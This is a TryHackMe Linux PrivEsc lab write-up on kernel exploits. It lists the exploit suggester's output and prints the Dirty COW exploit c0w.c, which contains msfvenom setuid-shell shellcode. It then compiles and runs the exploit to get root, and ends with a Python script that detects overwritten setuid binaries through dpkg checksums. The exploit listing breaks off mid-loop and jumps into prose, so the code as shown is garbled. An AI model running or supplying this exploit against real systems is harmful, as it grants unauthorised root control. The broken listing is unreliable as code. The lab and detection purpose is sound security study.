This time, we will try "Elevation of privileges using kernel exploits".
The target machine is the TryHackMe room below.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc "

This article is part 10.
If you would like to read the other parts of the Linux PrivEsc writeup with TryHackMe, please also check the previous part, elevation of privileges exploiting backups of history files, config files, and other important files.




Preparation
First, start the target machine with Start Machine.

Once the IP address is displayed, the machine is ready.

Since this is a privilege escalation exercise, I'll first check that I can connect to the machine via ssh as a low-privileged user.
Connect using "user/password321" as given in TryHackMe.
┌──(hacklab㉿hacklab)-[~/tryhackme/linuxprv]
└─$ ssh user@10.10.175.49                                                  130 ⨯
user@10.10.175.49's password:
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
Kernel Exploits
A kernel exploit takes advantage of a vulnerability in the operating system kernel itself (Linux, Windows, etc.), rather than in an application running on top of it.
Because the kernel runs in the most privileged mode of the system, a successful kernel exploit gives the attacker control over practically everything on the machine.
First, we use Linux Exploit Suggester 2 to identify potential kernel exploits for the kernel version of the current system.
user@debian:~$ perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl

  #####################
    Linux Exploit Suggester 2
  #####################

  Local Kernel: 2.6.32
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] can_bcm
      CVE-2010-2959
      Source: http://www.exploit-db.com/exploits/14814
  [3] dirty_cow
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [4] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [5] half_nelson1
      Alt: econet  CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [6] half_nelson2
      Alt: econet  CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [7] half_nelson3
      Alt: econet  CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [8] msr
      CVE-2013-0268
      Source: http://www.exploit-db.com/exploits/27297
  [9] pktcdvd
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [10] ptrace_kmod2
      Alt: ia32syscall,robert_you_suck  CVE-2010-3301
      Source: http://www.exploit-db.com/exploits/15023
  [11] rawmodePTY
      CVE-2014-0196
      Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
  [12] rds
      CVE-2010-3904
      Source: http://www.exploit-db.com/exploits/15285
  [13] reiserfs
      CVE-2010-1146
      Source: http://www.exploit-db.com/exploits/12130
  [14] video4linux
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024
The list is long, but let's try the best-known one:
[3] dirty_cow CVE-2016-5195 Source: http://www.exploit-db.com/exploits/40616
We use the Dirty COW exploit c0w.c (see https://dirtycow.ninja/ ). It backs up /usr/bin/passwd to /tmp/bak before overwriting it.
user@debian:~$ cat /home/user/tools/kernel-exploits/dirtycow/c0w.c
/*
 * A PTRACE_POKEDATA variant of CVE-2016-5195
 * should work on RHEL 5 & 6
 *
 * (un)comment correct payload (x86 or x64)!
 * $ gcc -pthread c0w.c -o c0w
 * $ ./c0w
 * DirtyCow root privilege escalation
 * Backing up /usr/bin/passwd.. to /tmp/bak
 * mmap fa65a000
 * madvise 0
 * ptrace 0
 * $ /usr/bin/passwd
 * [root@server foo]# whoami
 * root
 * [root@server foo]# id
 * uid=0(root) gid=501(foo) groups=501(foo)
 * @KrE80r
 */
#include<fcntl.h>
#include<pthread.h>
#include<string.h>
#include<stdio.h>
#include<stdint.h>
#include<sys/mman.h>
#include<sys/stat.h>
#include<sys/types.h>
#include<sys/wait.h>
#include<sys/ptrace.h>
#include<unistd.h>

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

// change if no permissions to read
char suid_binary[] = "/usr/bin/passwd";

/*
 * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
 */
unsigned char shell_code[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;

/*
 * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char shell_code[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00, 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x10, 0x00, 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53, 0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/

void *madviseThread(void *arg)
{
  int i,c=0;
  for(i=0;i<200000000;i++)
    c+=madvise(map,100,MADV_DONTNEED);
  printf("madvise %d\n\n",c);
}

int main(int argc,char *argv[])
{
  printf(" \n\
 (___) \n\
 (oo)_____/ \n\
  @@ `     \\ \n\
   \\ ____, /%s \n\
   //    // \n\
  ^^    ^^ \n\
", suid_binary);
  char *backup;
  printf("DirtyCow root privilege escalation\n");
  printf("Backing up %s to /tmp/bak\n", suid_binary);
  asprintf(&backup, "cp %s /tmp/bak", suid_binary);
  system(backup);
  f=open(suid_binary,O_RDONLY);
  fstat(f,&st);
  map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %x\n\n",map);
  pid=fork();
  if(pid){
    waitpid(pid,NULL,0);
    int u,i,o,c=0,l=sc_len;
    for(i=0;i<10000/l;i++)
      for(o=0;o
Compile and run the code.
user@debian:~$ gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
user@debian:~$ ./c0w
 (___)
 (oo)_____/
  @@ `     \
   \ ____, //usr/bin/passwd
   //    //
  ^^    ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 534b7000

madvise 0

ptrace 0
I think I was able to obtain root privileges by running /usr/bin/passwd!
user@debian:~$ /usr/bin/passwd
root@debian:/home/user# whoami
root
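From the defender's side, the change this exploit makes is visible on disk: the overwritten /usr/bin/passwd no longer matches the checksum dpkg recorded when the package was installed. The following is an added example (not part of this writeup or of c0w.c) that performs that comparison; the sample .md5sums lines, the temp-directory paths in demo() and the file contents are constructed for the demonstration.

```python
import hashlib
import os
import pathlib
import stat
import tempfile

def parse_md5sums(text):
    """Parse dpkg's .md5sums lines: '<md5hex>  <path without leading slash>'."""
    expected = {}
    for line in text.splitlines():
        digest, sep, path = line.strip().partition("  ")
        if sep and len(digest) == 32 and path:
            expected[path] = digest
    return expected

def md5_of(path):
    return hashlib.md5(pathlib.Path(path).read_bytes()).hexdigest()

def find_modified(expected, root="/", only_suid=True):
    """Relative paths whose on-disk hash differs from dpkg's record; only_suid
    limits the scan to setuid files, which is what the c0w payload overwrites."""
    modified = []
    for rel, digest in expected.items():
        full = os.path.join(root, rel)
        try:
            st = os.stat(full)
        except OSError:
            continue  # missing or unreadable file: not this check's concern
        if only_suid and not (st.st_mode & stat.S_ISUID):
            continue
        if md5_of(full) != digest:
            modified.append(rel)
    return sorted(modified)

def demo():
    """Constructed scenario in a temp dir: checksums recorded for a setuid
    'passwd' and a plain doc file, then both overwritten; only the setuid one
    should be reported."""
    root = tempfile.mkdtemp()
    files = {"usr/bin/passwd": 0o4755, "usr/share/doc/passwd/README": 0o644}
    record = []
    for rel, mode in files.items():
        full = pathlib.Path(root, rel)
        full.parent.mkdir(parents=True, exist_ok=True)
        full.write_bytes(b"original content (constructed)")
        full.chmod(mode)
        record.append("%s  %s" % (md5_of(full), rel))
    for rel in files:  # simulate the exploit overwriting the files
        pathlib.Path(root, rel).write_bytes(b"replaced content (constructed)")
    return find_modified(parse_md5sums("\n".join(record)), root=root)
```

On a real Debian host you would feed it the concatenated contents of /var/lib/dpkg/info/*.md5sums with root="/", which is essentially what debsums does; a hit on /usr/bin/passwd is the cue to restore the binary from the package and treat the kernel as unpatched.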
Summary
This time, I tried "Privilege Elevation Using Kernel Exploits."
It was a bit surprising to see that the suggester listed as many as 14 candidate kernel exploits for this one machine.
Since it is a last resort, I don't know whether I'll use it in the future, but it is something I have to remember.